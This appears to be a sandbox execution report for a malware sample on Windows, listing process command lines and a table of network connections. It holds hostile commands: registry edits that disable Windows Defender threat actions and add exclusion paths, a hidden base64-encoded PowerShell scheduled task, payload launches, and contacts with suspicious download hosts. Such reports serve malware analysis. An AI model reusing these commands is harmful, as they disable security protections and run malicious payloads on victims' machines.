C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe

"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 24408 -ip 24408

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 24408 -s 1132

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif

Tal.exe.pif H

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 5

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq PSUAService.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "psuaservice.exe"

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif

Tal.exe.pif H

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 5

C:\Windows\SysWOW64\PING.EXE

ping -n 5 localhost

C:\Windows\SysWOW64\PING.EXE

ping -n 5 localhost

C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe

C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\EdLqPAaTytMGRMX\SVjvbHJ.exe bH /site_id 525403 /S

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Tal.exe.pif

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Tal.exe.pif

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Users\Admin\AppData\Local\Temp\signed.exe

"C:\Users\Admin\AppData\Local\Temp\signed.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QwrkXrSOGBVCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QwrkXrSOGBVCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qtzXYlPxPmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qtzXYlPxPmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uyPuAlXAcIBU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uyPuAlXAcIBU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wKAtYsCOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wKAtYsCOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OsVMcSWGRXGXAxVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\OsVMcSWGRXGXAxVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IIxDORIMmvvtwMVt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IIxDORIMmvvtwMVt\" /t REG_DWORD /d 0 /reg:64;"

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\ProgramData\MsDrvSrvc.exe

"C:\ProgramData\MsDrvSrvc.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QwrkXrSOGBVCC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iNyCImZcmuwfbRRHWCR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qtzXYlPxPmUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qtzXYlPxPmUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uyPuAlXAcIBU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uyPuAlXAcIBU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wKAtYsCOU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wKAtYsCOU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OsVMcSWGRXGXAxVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\OsVMcSWGRXGXAxVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\XPKruKcwkyRJuFApW /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IIxDORIMmvvtwMVt /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IIxDORIMmvvtwMVt /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gnPdzlYCb" /SC once /ST 08:48:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gnPdzlYCb"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 804 -ip 804

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 804 -s 484

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 1164 -ip 1164

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 12

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gnPdzlYCb"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "raBkRkUFhLhqVOsAt" /SC once /ST 05:47:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IIxDORIMmvvtwMVt\hnASLnknHwflCYp\YHiRqDo.exe\" Jd /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "raBkRkUFhLhqVOsAt"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe

"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Get-Variable.exe" Name host ValueOnly True

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe

C:\Users\Admin\AppData\Local\Temp\62eca45584\bguuwe.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 7472 -ip 7472

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 484

Network

Country Destination Domain Proto
NL 20.190.160.132:443 tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 85.202.169.116:80 85.202.169.116 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 193.233.185.125:80 tcp
NL 20.190.160.4:443 tcp
US 193.233.185.125:80 tcp
US 93.184.221.240:80 tcp
IE 20.50.80.210:443 tcp
NL 20.190.160.8:443 tcp
NL 85.202.169.116:80 85.202.169.116 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 timetogof.at udp
RU 185.106.93.10:80 185.106.93.10 tcp
US 8.8.8.8:53 fdhjtnthdngnd.click udp
SC 185.215.113.15:80 185.215.113.15 tcp
RU 193.106.191.246:80 193.106.191.246 tcp
US 8.8.8.8:53 fantadentalperu.com udp
US 8.8.8.8:53 iranparsa-novin.com udp
NL 212.193.30.45:80 212.193.30.45 tcp
US 8.8.8.8:53 maper.info udp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 2.56.57.65:80 2.56.57.65 tcp
IR 185.88.178.71:80 iranparsa-novin.com tcp
US 188.114.96.0:80 fdhjtnthdngnd.click tcp
DE 148.251.234.93:80 maper.info tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 188.114.96.0:443 fdhjtnthdngnd.click tcp
CA 192.99.207.151:80 fantadentalperu.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
DE 148.251.234.93:80 maper.info tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
DE 148.251.234.93:80 maper.info tcp
KR 211.119.84.112:80 timetogof.at tcp
IR 185.88.178.71:80 iranparsa-novin.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
DE 148.251.234.93:443 maper.info tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
CA 192.99.207.151:80 fantadentalperu.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
IR 185.88.178.71:80 iranparsa-novin.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
IR 185.88.178.71:443 iranparsa-novin.com tcp
CA 192.99.207.151:80 fantadentalperu.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
CA 192.99.207.151:443 fantadentalperu.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 0310799b411df1c4f1b0f93033ffbddb.clo.footprintdns.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
BR 191.232.215.149:443 0310799b411df1c4f1b0f93033ffbddb.clo.footprintdns.com tcp
KR 211.119.84.112:80 timetogof.at tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 93.184.221.240:80 tcp
US 93.184.221.240:80 tcp
NL 20.190.160.134:443 tcp
US 93.184.220.29:80 tcp
US 204.79.197.203:80 api.msn.com tcp
NL 20.190.160.2:443 tcp
US 8.8.8.8:53 getmut-cleaner.online udp
RU 176.57.213.135:443 getmut-cleaner.online tcp
NL 20.190.160.6:443 tcp
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 checkip.amazonaws.com udp
IE 52.19.185.150:80 checkip.amazonaws.com tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 85.202.169.116:80 85.202.169.116 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 api.2ip.ua udp
DE 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 ushatamaiet.xyz udp
LV 94.140.112.166:80 ushatamaiet.xyz tcp
RU 94.26.226.51:80 94.26.226.51 tcp
US 8.8.8.8:53 4hmn.short.gy udp
DE 52.59.165.42:443 4hmn.short.gy tcp
US 8.8.8.8:53 blackhk1.beget.tech udp
US 8.8.8.8:53 jollygiunco.com udp
IT 31.11.32.193:443 jollygiunco.com tcp
RU 5.101.153.227:80 blackhk1.beget.tech tcp
RU 5.101.153.227:80 blackhk1.beget.tech tcp
